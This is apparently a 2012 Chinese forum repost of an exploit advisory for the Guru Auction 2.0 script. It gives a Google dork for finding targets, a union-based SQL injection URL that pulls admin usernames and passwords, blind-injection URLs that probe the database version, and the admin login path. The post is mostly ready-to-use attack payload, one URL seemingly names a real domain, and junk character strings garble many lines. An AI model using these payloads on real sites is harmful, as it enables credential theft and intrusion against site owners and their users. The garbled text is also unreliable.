Guru Auction 2.0 Multiple SQL Injection Vulnerabilities3 M1 r, ~2 Q& S0 i4 P
/ n# M7 j9 f+ ]8 H$ }' W; K作者 : v3n0m o% W: P- B7 U7 Q: s& a
应用 : Guru Auction 2.0. Y H( ^/ v9 L; C# K$ S
Price : $49
% C( b/ }3 @3 |0 tVendor : http://www.guruscript.com/
" T4 q8 `. J! D0 Y0 j6 u( WGoogle Dork : inurl:subcat.php?cate_id=
4 I2 W" K# v: H5 `) c
" t. t4 i9 n5 U' V% j) TSQLi p0c: {2 S9 D, n2 U% U, l
~~~~~~~~~~
1 l3 h! \: k% E0 u. _9 D( shttp://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--' L d7 E# N+ d; K6 V! w
/ I* G" P; J0 H1 k9 J4 p
, X7 f4 y6 J9 [% _7 c4 r盲注 p0c:2 ~6 Y* q, o/ F+ o5 M
~~~~~~~~~~
7 d& i, X5 {! r' X9 H+ @+ F& B7 Uhttp://www.political-security.com /[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true
- I# t/ p" e5 x Xhttp://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false* Z( X/ N1 p, C A: q6 e! J( `
0 x( \! T, ]4 J3 V, |
管理登录入口:
, i4 J2 e) ~ K~~~~~~~~~~
" G) p4 L+ J$ Z* D" g' A: bhttp://domain.tld/[path]/admin/7 d, M0 x: `, y* f: g* S
|
发表于 2012-12-31 09:24:05
收藏
支持
反对